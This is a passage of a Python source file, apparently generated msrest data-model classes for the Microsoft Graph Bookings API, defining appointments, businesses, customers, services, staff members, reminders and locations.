super(CollectionOfBookingStaffMember, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class MicrosoftGraphEntity(msrest.serialization.Model):
    """entity.

    Base type carrying the read-only Microsoft Graph identifier.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param id: Read-only.
    :type id: str
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "id": {"key": "id", "type": "str"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        id: Optional[str] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.id = id
        self.additional_properties = additional_properties
class MicrosoftGraphBookingAppointment(MicrosoftGraphEntity):
    """Represents a booked appointment of a service by a customer in a business.
    :param id: Read-only.
    :type id: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
    collection.
    :type additional_properties: dict[str, object]
    :param additional_information:
    :type additional_information: str
    :param customer_email_address:
    :type customer_email_address: str
    :param customer_id: The id of the booking customer associated with this appointment.
    :type customer_id: str
    :param customer_location: location.
    :type customer_location: ~bookings.models.MicrosoftGraphLocation
    :param customer_name:
    :type customer_name: str
    :param customer_notes: Notes from the customer associated with this appointment.
    :type customer_notes: str
    :param customer_phone:
    :type customer_phone: str
    :param duration:
    :type duration: ~datetime.timedelta
    :param end: dateTimeTimeZone.
    :type end: ~bookings.models.MicrosoftGraphDateTimeZone
    :param invoice_amount:
    :type invoice_amount: float
    :param invoice_date: dateTimeTimeZone.
    :type invoice_date: ~bookings.models.MicrosoftGraphDateTimeZone
    :param invoice_id:
    :type invoice_id: str
    :param invoice_status: Possible values include: "draft", "reviewing", "open", "canceled",
    "paid", "corrective".
    :type invoice_status: str or ~bookings.models.MicrosoftGraphBookingInvoiceStatus
    :param invoice_url:
    :type invoice_url: str
    :param is_location_online:
    :type is_location_online: bool
    :param online_meeting_url:
    :type online_meeting_url: str
    :param opt_out_of_customer_email:
    :type opt_out_of_customer_email: bool
    :param post_buffer:
    :type post_buffer: ~datetime.timedelta
    :param pre_buffer:
    :type pre_buffer: ~datetime.timedelta
    :param price:
    :type price: float
    :param price_type: Possible values include: "undefined", "fixedPrice", "startingAt", "hourly",
    "free", "priceVaries", "callUs", "notSet".
    :type price_type: str or ~bookings.models.MicrosoftGraphBookingPriceType
    :param reminders:
    :type reminders: list[~bookings.models.MicrosoftGraphBookingReminder]
    :param self_service_appointment_id:
    :type self_service_appointment_id: str
    :param service_id: The id of the booking service associated with this appointment.
    :type service_id: str
    :param service_location: location.
    :type service_location: ~bookings.models.MicrosoftGraphLocation
    :param service_name: The name of the booking service associated with this appointment.
    :type service_name: str
    :param service_notes:
    :type service_notes: str
    :param staff_member_ids:
    :type staff_member_ids: list[str]
    :param start: dateTimeTimeZone.
    :type start: ~bookings.models.MicrosoftGraphDateTimeZone
    """
    # msrest serialization metadata: Python attribute -> JSON wire key and type string.
    # Enum-valued fields (invoiceStatus, priceType) are declared as plain 'str' on the wire.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
        'additional_information': {'key': 'additionalInformation', 'type': 'str'},
        'customer_email_address': {'key': 'customerEmailAddress', 'type': 'str'},
        'customer_id': {'key': 'customerId', 'type': 'str'},
        'customer_location': {'key': 'customerLocation', 'type': 'MicrosoftGraphLocation'},
        'customer_name': {'key': 'customerName', 'type': 'str'},
        'customer_notes': {'key': 'customerNotes', 'type': 'str'},
        'customer_phone': {'key': 'customerPhone', 'type': 'str'},
        'duration': {'key': 'duration', 'type': 'duration'},
        'end': {'key': 'end', 'type': 'MicrosoftGraphDateTimeZone'},
        'invoice_amount': {'key': 'invoiceAmount', 'type': 'float'},
        'invoice_date': {'key': 'invoiceDate', 'type': 'MicrosoftGraphDateTimeZone'},
        'invoice_id': {'key': 'invoiceId', 'type': 'str'},
        'invoice_status': {'key': 'invoiceStatus', 'type': 'str'},
        'invoice_url': {'key': 'invoiceUrl', 'type': 'str'},
        'is_location_online': {'key': 'isLocationOnline', 'type': 'bool'},
        'online_meeting_url': {'key': 'onlineMeetingUrl', 'type': 'str'},
        'opt_out_of_customer_email': {'key': 'optOutOfCustomerEmail', 'type': 'bool'},
        'post_buffer': {'key': 'postBuffer', 'type': 'duration'},
        'pre_buffer': {'key': 'preBuffer', 'type': 'duration'},
        'price': {'key': 'price', 'type': 'float'},
        'price_type': {'key': 'priceType', 'type': 'str'},
        'reminders': {'key': 'reminders', 'type': '[MicrosoftGraphBookingReminder]'},
        'self_service_appointment_id': {'key': 'selfServiceAppointmentId', 'type': 'str'},
        'service_id': {'key': 'serviceId', 'type': 'str'},
        'service_location': {'key': 'serviceLocation', 'type': 'MicrosoftGraphLocation'},
        'service_name': {'key': 'serviceName', 'type': 'str'},
        'service_notes': {'key': 'serviceNotes', 'type': 'str'},
        'staff_member_ids': {'key': 'staffMemberIds', 'type': '[str]'},
        'start': {'key': 'start', 'type': 'MicrosoftGraphDateTimeZone'},
    }
    def __init__(
        self,
        *,
        id: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        additional_information: Optional[str] = None,
        customer_email_address: Optional[str] = None,
        customer_id: Optional[str] = None,
        customer_location: Optional["MicrosoftGraphLocation"] = None,
        customer_name: Optional[str] = None,
        customer_notes: Optional[str] = None,
        customer_phone: Optional[str] = None,
        duration: Optional[datetime.timedelta] = None,
        end: Optional["MicrosoftGraphDateTimeZone"] = None,
        invoice_amount: Optional[float] = None,
        invoice_date: Optional["MicrosoftGraphDateTimeZone"] = None,
        invoice_id: Optional[str] = None,
        invoice_status: Optional[Union[str, "MicrosoftGraphBookingInvoiceStatus"]] = None,
        invoice_url: Optional[str] = None,
        is_location_online: Optional[bool] = None,
        online_meeting_url: Optional[str] = None,
        opt_out_of_customer_email: Optional[bool] = None,
        post_buffer: Optional[datetime.timedelta] = None,
        pre_buffer: Optional[datetime.timedelta] = None,
        price: Optional[float] = None,
        price_type: Optional[Union[str, "MicrosoftGraphBookingPriceType"]] = None,
        reminders: Optional[List["MicrosoftGraphBookingReminder"]] = None,
        self_service_appointment_id: Optional[str] = None,
        service_id: Optional[str] = None,
        service_location: Optional["MicrosoftGraphLocation"] = None,
        service_name: Optional[str] = None,
        service_notes: Optional[str] = None,
        staff_member_ids: Optional[List[str]] = None,
        start: Optional["MicrosoftGraphDateTimeZone"] = None,
        **kwargs
    ):
        # 'id' is stored by the MicrosoftGraphEntity base; all remaining values are kept as-is.
        super(MicrosoftGraphBookingAppointment, self).__init__(id=id, **kwargs)
        self.additional_properties = additional_properties
        self.additional_information = additional_information
        self.customer_email_address = customer_email_address
        self.customer_id = customer_id
        self.customer_location = customer_location
        self.customer_name = customer_name
        self.customer_notes = customer_notes
        self.customer_phone = customer_phone
        self.duration = duration
        self.end = end
        self.invoice_amount = invoice_amount
        self.invoice_date = invoice_date
        self.invoice_id = invoice_id
        self.invoice_status = invoice_status
        self.invoice_url = invoice_url
        self.is_location_online = is_location_online
        self.online_meeting_url = online_meeting_url
        self.opt_out_of_customer_email = opt_out_of_customer_email
        self.post_buffer = post_buffer
        self.pre_buffer = pre_buffer
        self.price = price
        self.price_type = price_type
        self.reminders = reminders
        self.self_service_appointment_id = self_service_appointment_id
        self.service_id = service_id
        self.service_location = service_location
        self.service_name = service_name
        self.service_notes = service_notes
        self.staff_member_ids = staff_member_ids
        self.start = start
class MicrosoftGraphBookingNamedEntity(MicrosoftGraphEntity):
    """Base type for Booking entities that expose a display name.

    :param id: Read-only.
    :type id: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param display_name: Display name of this entity.
    :type display_name: str
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "additional_properties": {"key": "", "type": "{object}"},
        "display_name": {"key": "displayName", "type": "str"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        display_name: Optional[str] = None,
        **kwargs
    ):
        # The base class stores ``id``; only the name-specific fields remain here.
        super().__init__(id=id, **kwargs)
        self.display_name = display_name
        self.additional_properties = additional_properties
class MicrosoftGraphBookingBusiness(MicrosoftGraphBookingNamedEntity):
    """Represents a Microsoft Bookings business.
    :param id: Read-only.
    :type id: str
    :param display_name: Display name of this entity.
    :type display_name: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
    collection.
    :type additional_properties: dict[str, object]
    :param address: physicalAddress.
    :type address: ~bookings.models.MicrosoftGraphPhysicalAddress
    :param business_hours:
    :type business_hours: list[~bookings.models.MicrosoftGraphBookingWorkHours]
    :param business_type:
    :type business_type: str
    :param default_currency_iso:
    :type default_currency_iso: str
    :param email:
    :type email: str
    :param is_published:
    :type is_published: bool
    :param phone:
    :type phone: str
    :param public_url:
    :type public_url: str
    :param scheduling_policy: This type represents the set of policies that dictate how bookings
    can be created in a Booking Calendar.
    :type scheduling_policy: ~bookings.models.MicrosoftGraphBookingSchedulingPolicy
    :param web_site_url: The URL of the business web site.
    :type web_site_url: str
    :param appointments: All appointments in this business.
    :type appointments: list[~bookings.models.MicrosoftGraphBookingAppointment]
    :param calendar_view: A calendar view of appointments in this business.
    :type calendar_view: list[~bookings.models.MicrosoftGraphBookingAppointment]
    :param customers: All customers of this business.
    :type customers: list[~bookings.models.MicrosoftGraphBookingCustomer]
    :param services: All services offered by this business.
    :type services: list[~bookings.models.MicrosoftGraphBookingService]
    :param staff_members: All staff members that provides services in this business.
    :type staff_members: list[~bookings.models.MicrosoftGraphBookingStaffMember]
    """
    # msrest serialization metadata: Python attribute -> JSON wire key and type string.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
        'address': {'key': 'address', 'type': 'MicrosoftGraphPhysicalAddress'},
        'business_hours': {'key': 'businessHours', 'type': '[MicrosoftGraphBookingWorkHours]'},
        'business_type': {'key': 'businessType', 'type': 'str'},
        'default_currency_iso': {'key': 'defaultCurrencyIso', 'type': 'str'},
        'email': {'key': 'email', 'type': 'str'},
        'is_published': {'key': 'isPublished', 'type': 'bool'},
        'phone': {'key': 'phone', 'type': 'str'},
        'public_url': {'key': 'publicUrl', 'type': 'str'},
        'scheduling_policy': {'key': 'schedulingPolicy', 'type': 'MicrosoftGraphBookingSchedulingPolicy'},
        'web_site_url': {'key': 'webSiteUrl', 'type': 'str'},
        'appointments': {'key': 'appointments', 'type': '[MicrosoftGraphBookingAppointment]'},
        'calendar_view': {'key': 'calendarView', 'type': '[MicrosoftGraphBookingAppointment]'},
        'customers': {'key': 'customers', 'type': '[MicrosoftGraphBookingCustomer]'},
        'services': {'key': 'services', 'type': '[MicrosoftGraphBookingService]'},
        'staff_members': {'key': 'staffMembers', 'type': '[MicrosoftGraphBookingStaffMember]'},
    }
    def __init__(
        self,
        *,
        id: Optional[str] = None,
        display_name: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        address: Optional["MicrosoftGraphPhysicalAddress"] = None,
        business_hours: Optional[List["MicrosoftGraphBookingWorkHours"]] = None,
        business_type: Optional[str] = None,
        default_currency_iso: Optional[str] = None,
        email: Optional[str] = None,
        is_published: Optional[bool] = None,
        phone: Optional[str] = None,
        public_url: Optional[str] = None,
        scheduling_policy: Optional["MicrosoftGraphBookingSchedulingPolicy"] = None,
        web_site_url: Optional[str] = None,
        appointments: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
        calendar_view: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
        customers: Optional[List["MicrosoftGraphBookingCustomer"]] = None,
        services: Optional[List["MicrosoftGraphBookingService"]] = None,
        staff_members: Optional[List["MicrosoftGraphBookingStaffMember"]] = None,
        **kwargs
    ):
        # 'id' and 'display_name' are stored by the named-entity base class.
        super(MicrosoftGraphBookingBusiness, self).__init__(id=id, display_name=display_name, **kwargs)
        self.additional_properties = additional_properties
        self.address = address
        self.business_hours = business_hours
        self.business_type = business_type
        self.default_currency_iso = default_currency_iso
        self.email = email
        self.is_published = is_published
        self.phone = phone
        self.public_url = public_url
        self.scheduling_policy = scheduling_policy
        self.web_site_url = web_site_url
        self.appointments = appointments
        self.calendar_view = calendar_view
        self.customers = customers
        self.services = services
        self.staff_members = staff_members
class MicrosoftGraphBookingCurrency(MicrosoftGraphEntity):
    """bookingCurrency.

    :param id: Read-only.
    :type id: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param symbol: Currency symbol, e.g. "$".
    :type symbol: str
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "additional_properties": {"key": "", "type": "{object}"},
        "symbol": {"key": "symbol", "type": "str"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        symbol: Optional[str] = None,
        **kwargs
    ):
        super().__init__(id=id, **kwargs)
        self.symbol = symbol
        self.additional_properties = additional_properties
class MicrosoftGraphBookingPerson(MicrosoftGraphBookingNamedEntity):
    """Base type for a booking customer or staff member.

    :param id: Read-only.
    :type id: str
    :param display_name: Display name of this entity.
    :type display_name: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param email_address: The e-mail address of this person.
    :type email_address: str
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "display_name": {"key": "displayName", "type": "str"},
        "additional_properties": {"key": "", "type": "{object}"},
        "email_address": {"key": "emailAddress", "type": "str"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,
        display_name: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        email_address: Optional[str] = None,
        **kwargs
    ):
        # ``id`` and ``display_name`` are stored by the named-entity base class.
        super().__init__(id=id, display_name=display_name, **kwargs)
        self.email_address = email_address
        self.additional_properties = additional_properties
class MicrosoftGraphBookingCustomer(MicrosoftGraphBookingPerson):
    """Represents a customer of the business.

    :param id: Read-only.
    :type id: str
    :param display_name: Display name of this entity.
    :type display_name: str
    :param email_address: The e-mail address of this person.
    :type email_address: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "display_name": {"key": "displayName", "type": "str"},
        "email_address": {"key": "emailAddress", "type": "str"},
        "additional_properties": {"key": "", "type": "{object}"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,
        display_name: Optional[str] = None,
        email_address: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        **kwargs
    ):
        # All declared fields except additional_properties are stored by the person base class.
        super().__init__(id=id, display_name=display_name, email_address=email_address, **kwargs)
        self.additional_properties = additional_properties
class MicrosoftGraphBookingReminder(msrest.serialization.Model):
    """Describes when, and to whom, an e-mail reminder is sent.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param message: Message to send.
    :type message: str
    :param offset: How much time before an appointment the reminder should be sent.
    :type offset: ~datetime.timedelta
    :param recipients: Possible values include: "allAttendees", "staff", "customer".
    :type recipients: str or ~bookings.models.MicrosoftGraphBookingReminderRecipients
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    # The enum-valued 'recipients' field travels on the wire as a plain string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "message": {"key": "message", "type": "str"},
        "offset": {"key": "offset", "type": "duration"},
        "recipients": {"key": "recipients", "type": "str"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        message: Optional[str] = None,
        offset: Optional[datetime.timedelta] = None,
        recipients: Optional[Union[str, "MicrosoftGraphBookingReminderRecipients"]] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.recipients = recipients
        self.offset = offset
        self.message = message
        self.additional_properties = additional_properties
class MicrosoftGraphBookingSchedulingPolicy(msrest.serialization.Model):
    """The set of policies that dictate how bookings can be created in a Booking Calendar.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param allow_staff_selection: Allow customers to choose a specific person for the booking.
    :type allow_staff_selection: bool
    :param maximum_advance: Maximum number of days in advance that a booking can be made.
    :type maximum_advance: ~datetime.timedelta
    :param minimum_lead_time: Minimum lead time for bookings and cancellations.
    :type minimum_lead_time: ~datetime.timedelta
    :param send_confirmations_to_owner: Notify the business via email when a booking is created or
     changed.
    :type send_confirmations_to_owner: bool
    :param time_slot_interval: Duration of each time slot.
    :type time_slot_interval: ~datetime.timedelta
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "allow_staff_selection": {"key": "allowStaffSelection", "type": "bool"},
        "maximum_advance": {"key": "maximumAdvance", "type": "duration"},
        "minimum_lead_time": {"key": "minimumLeadTime", "type": "duration"},
        "send_confirmations_to_owner": {"key": "sendConfirmationsToOwner", "type": "bool"},
        "time_slot_interval": {"key": "timeSlotInterval", "type": "duration"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        allow_staff_selection: Optional[bool] = None,
        maximum_advance: Optional[datetime.timedelta] = None,
        minimum_lead_time: Optional[datetime.timedelta] = None,
        send_confirmations_to_owner: Optional[bool] = None,
        time_slot_interval: Optional[datetime.timedelta] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.time_slot_interval = time_slot_interval
        self.send_confirmations_to_owner = send_confirmations_to_owner
        self.minimum_lead_time = minimum_lead_time
        self.maximum_advance = maximum_advance
        self.allow_staff_selection = allow_staff_selection
        self.additional_properties = additional_properties
class MicrosoftGraphBookingService(MicrosoftGraphBookingNamedEntity):
    """Represents a particular service offered by a booking business.
    :param id: Read-only.
    :type id: str
    :param display_name: Display name of this entity.
    :type display_name: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
    collection.
    :type additional_properties: dict[str, object]
    :param additional_information:
    :type additional_information: str
    :param default_duration:
    :type default_duration: ~datetime.timedelta
    :param default_location: location.
    :type default_location: ~bookings.models.MicrosoftGraphLocation
    :param default_price:
    :type default_price: float
    :param default_price_type: Possible values include: "undefined", "fixedPrice", "startingAt",
    "hourly", "free", "priceVaries", "callUs", "notSet".
    :type default_price_type: str or ~bookings.models.MicrosoftGraphBookingPriceType
    :param default_reminders: The default reminders set in an appointment of this service.
    :type default_reminders: list[~bookings.models.MicrosoftGraphBookingReminder]
    :param description:
    :type description: str
    :param is_hidden_from_customers:
    :type is_hidden_from_customers: bool
    :param is_location_online:
    :type is_location_online: bool
    :param notes:
    :type notes: str
    :param post_buffer:
    :type post_buffer: ~datetime.timedelta
    :param pre_buffer:
    :type pre_buffer: ~datetime.timedelta
    :param scheduling_policy: This type represents the set of policies that dictate how bookings
    can be created in a Booking Calendar.
    :type scheduling_policy: ~bookings.models.MicrosoftGraphBookingSchedulingPolicy
    :param staff_member_ids:
    :type staff_member_ids: list[str]
    """
    # msrest serialization metadata: Python attribute -> JSON wire key and type string.
    # The enum-valued 'defaultPriceType' field is declared as a plain 'str' on the wire.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
        'additional_information': {'key': 'additionalInformation', 'type': 'str'},
        'default_duration': {'key': 'defaultDuration', 'type': 'duration'},
        'default_location': {'key': 'defaultLocation', 'type': 'MicrosoftGraphLocation'},
        'default_price': {'key': 'defaultPrice', 'type': 'float'},
        'default_price_type': {'key': 'defaultPriceType', 'type': 'str'},
        'default_reminders': {'key': 'defaultReminders', 'type': '[MicrosoftGraphBookingReminder]'},
        'description': {'key': 'description', 'type': 'str'},
        'is_hidden_from_customers': {'key': 'isHiddenFromCustomers', 'type': 'bool'},
        'is_location_online': {'key': 'isLocationOnline', 'type': 'bool'},
        'notes': {'key': 'notes', 'type': 'str'},
        'post_buffer': {'key': 'postBuffer', 'type': 'duration'},
        'pre_buffer': {'key': 'preBuffer', 'type': 'duration'},
        'scheduling_policy': {'key': 'schedulingPolicy', 'type': 'MicrosoftGraphBookingSchedulingPolicy'},
        'staff_member_ids': {'key': 'staffMemberIds', 'type': '[str]'},
    }
    def __init__(
        self,
        *,
        id: Optional[str] = None,
        display_name: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        additional_information: Optional[str] = None,
        default_duration: Optional[datetime.timedelta] = None,
        default_location: Optional["MicrosoftGraphLocation"] = None,
        default_price: Optional[float] = None,
        default_price_type: Optional[Union[str, "MicrosoftGraphBookingPriceType"]] = None,
        default_reminders: Optional[List["MicrosoftGraphBookingReminder"]] = None,
        description: Optional[str] = None,
        is_hidden_from_customers: Optional[bool] = None,
        is_location_online: Optional[bool] = None,
        notes: Optional[str] = None,
        post_buffer: Optional[datetime.timedelta] = None,
        pre_buffer: Optional[datetime.timedelta] = None,
        scheduling_policy: Optional["MicrosoftGraphBookingSchedulingPolicy"] = None,
        staff_member_ids: Optional[List[str]] = None,
        **kwargs
    ):
        # 'id' and 'display_name' are stored by the named-entity base class.
        super(MicrosoftGraphBookingService, self).__init__(id=id, display_name=display_name, **kwargs)
        self.additional_properties = additional_properties
        self.additional_information = additional_information
        self.default_duration = default_duration
        self.default_location = default_location
        self.default_price = default_price
        self.default_price_type = default_price_type
        self.default_reminders = default_reminders
        self.description = description
        self.is_hidden_from_customers = is_hidden_from_customers
        self.is_location_online = is_location_online
        self.notes = notes
        self.post_buffer = post_buffer
        self.pre_buffer = pre_buffer
        self.scheduling_policy = scheduling_policy
        self.staff_member_ids = staff_member_ids
class MicrosoftGraphBookingStaffMember(MicrosoftGraphBookingPerson):
    """Represents a staff member who provides services in a business.
    :param id: Read-only.
    :type id: str
    :param display_name: Display name of this entity.
    :type display_name: str
    :param email_address: The e-mail address of this person.
    :type email_address: str
    :param additional_properties: Unmatched properties from the message are deserialized to this
    collection.
    :type additional_properties: dict[str, object]
    :param availability_is_affected_by_personal_calendar:
    :type availability_is_affected_by_personal_calendar: bool
    :param color_index:
    :type color_index: int
    :param role: Possible values include: "guest", "administrator", "viewer", "externalGuest".
    :type role: str or ~bookings.models.MicrosoftGraphBookingStaffRole
    :param use_business_hours:
    :type use_business_hours: bool
    :param working_hours:
    :type working_hours: list[~bookings.models.MicrosoftGraphBookingWorkHours]
    """
    # msrest validation rules: color_index is constrained to the int32 range.
    _validation = {
        'color_index': {'maximum': 2147483647, 'minimum': -2147483648},
    }
    # msrest serialization metadata: Python attribute -> JSON wire key and type string.
    # The enum-valued 'role' field is declared as a plain 'str' on the wire.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'email_address': {'key': 'emailAddress', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
        'availability_is_affected_by_personal_calendar': {'key': 'availabilityIsAffectedByPersonalCalendar', 'type': 'bool'},
        'color_index': {'key': 'colorIndex', 'type': 'int'},
        'role': {'key': 'role', 'type': 'str'},
        'use_business_hours': {'key': 'useBusinessHours', 'type': 'bool'},
        'working_hours': {'key': 'workingHours', 'type': '[MicrosoftGraphBookingWorkHours]'},
    }
    def __init__(
        self,
        *,
        id: Optional[str] = None,
        display_name: Optional[str] = None,
        email_address: Optional[str] = None,
        additional_properties: Optional[Dict[str, object]] = None,
        availability_is_affected_by_personal_calendar: Optional[bool] = None,
        color_index: Optional[int] = None,
        role: Optional[Union[str, "MicrosoftGraphBookingStaffRole"]] = None,
        use_business_hours: Optional[bool] = None,
        working_hours: Optional[List["MicrosoftGraphBookingWorkHours"]] = None,
        **kwargs
    ):
        # 'id', 'display_name' and 'email_address' are stored by the person base class.
        super(MicrosoftGraphBookingStaffMember, self).__init__(id=id, display_name=display_name, email_address=email_address, **kwargs)
        self.additional_properties = additional_properties
        self.availability_is_affected_by_personal_calendar = availability_is_affected_by_personal_calendar
        self.color_index = color_index
        self.role = role
        self.use_business_hours = use_business_hours
        self.working_hours = working_hours
class MicrosoftGraphBookingWorkHours(msrest.serialization.Model):
    """The set of working hours in a single day of the week.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param day: Possible values include: "sunday", "monday", "tuesday", "wednesday", "thursday",
     "friday", "saturday".
    :type day: str or ~bookings.models.MicrosoftGraphDayOfWeek
    :param time_slots: A list of start/end times during a day.
    :type time_slots: list[~bookings.models.MicrosoftGraphBookingWorkTimeSlot]
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    # The enum-valued 'day' field travels on the wire as a plain string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "day": {"key": "day", "type": "str"},
        "time_slots": {"key": "timeSlots", "type": "[MicrosoftGraphBookingWorkTimeSlot]"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        day: Optional[Union[str, "MicrosoftGraphDayOfWeek"]] = None,
        time_slots: Optional[List["MicrosoftGraphBookingWorkTimeSlot"]] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.time_slots = time_slots
        self.day = day
        self.additional_properties = additional_properties
class MicrosoftGraphBookingWorkTimeSlot(msrest.serialization.Model):
    """bookingWorkTimeSlot.

    A single start/end time-of-day pair within a working day.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param end: End of the slot.
    :type end: ~datetime.time
    :param start: Start of the slot.
    :type start: ~datetime.time
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "end": {"key": "end", "type": "time"},
        "start": {"key": "start", "type": "time"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        end: Optional[datetime.time] = None,
        start: Optional[datetime.time] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.start = start
        self.end = end
        self.additional_properties = additional_properties
class MicrosoftGraphDateTimeZone(msrest.serialization.Model):
    """dateTimeTimeZone.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param date_time: A single point of time in a combined date and time representation
     ({date}T{time}; for example, 2017-08-29T04:00:00.0000000).
    :type date_time: str
    :param time_zone: Represents a time zone, for example, 'Pacific Standard Time'. See below for
     more possible values.
    :type time_zone: str
    """

    # msrest metadata: attribute name -> JSON wire key and type string.
    _attribute_map = {
        "additional_properties": {"key": "", "type": "{object}"},
        "date_time": {"key": "dateTime", "type": "str"},
        "time_zone": {"key": "timeZone", "type": "str"},
    }

    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        date_time: Optional[str] = None,
        time_zone: Optional[str] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.time_zone = time_zone
        self.date_time = date_time
        self.additional_properties = additional_properties
class MicrosoftGraphLocation(msrest.serialization.Model):
    """location.
    :param additional_properties: Unmatched properties from the message are deserialized to this
    collection.
    :type additional_properties: dict[str, object]
    :param address: physicalAddress.
    :type address: ~bookings.models.MicrosoftGraphPhysicalAddress
    :param coordinates: outlookGeoCoordinates.
    :type coordinates: ~bookings.models.MicrosoftGraphOutlookGeoCoordinates
    :param display_name: The name associated with the location.
    :type display_name: str
    :param location_email_address: Optional email address of the location.
    :type location_email_address: str
    :param location_type: Possible values include: "default", "conferenceRoom", "homeAddress",
    "businessAddress", "geoCoordinates", "streetAddress", "hotel", "restaurant", "localBusiness",
    "postalAddress".
    :type location_type: str or ~bookings.models.MicrosoftGraphLocationType
    :param location_uri: Optional URI representing the location.
    :type location_uri: str
    :param unique_id: For internal use only.
    :type unique_id: str
    :param unique_id_type: Possible values include: "unknown", "locationStore", "directory",
    "private", "bing".
    :type unique_id_type: str or ~bookings.models.MicrosoftGraphLocationUniqueIdType
    """
    # msrest serialization metadata: Python attribute -> JSON wire key and type string.
    # Enum-valued fields (locationType, uniqueIdType) are declared as plain 'str' on the wire.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'address': {'key': 'address', 'type': 'MicrosoftGraphPhysicalAddress'},
        'coordinates': {'key': 'coordinates', 'type': 'MicrosoftGraphOutlookGeoCoordinates'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'location_email_address': {'key': 'locationEmailAddress', 'type': 'str'},
        'location_type': {'key': 'locationType', 'type': 'str'},
        'location_uri': {'key': 'locationUri', 'type': 'str'},
        'unique_id': {'key': 'uniqueId', 'type': 'str'},
        'unique_id_type': {'key': 'uniqueIdType', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        address: Optional["MicrosoftGraphPhysicalAddress"] = None,
        coordinates: Optional["MicrosoftGraphOutlookGeoCoordinates"] = None,
        display_name: Optional[str] = None,
        location_email_address: Optional[str] = None,
        location_type: Optional[Union[str, "MicrosoftGraphLocationType"]] = None,
        location_uri: Optional[str] = None,
        unique_id: Optional[str] = None,
        unique_id_type: Optional[Union[str, "MicrosoftGraphLocationUniqueIdType"]] = None,
        **kwargs
    ):
        super(MicrosoftGraphLocation, self).__init__(**kwargs)
        self.additional_properties = additional_properties
        self.address = address
        self.coordinates = coordinates
        self.display_name = display_name
        self.location_email_address = location_email_address
        self.location_type = location_type
        self.location_uri = location_uri
        self.unique_id = unique_id
        self.unique_id_type = unique_id_type
class MicrosoftGraphOutlookGeoCoordinates(msrest.serialization.Model):
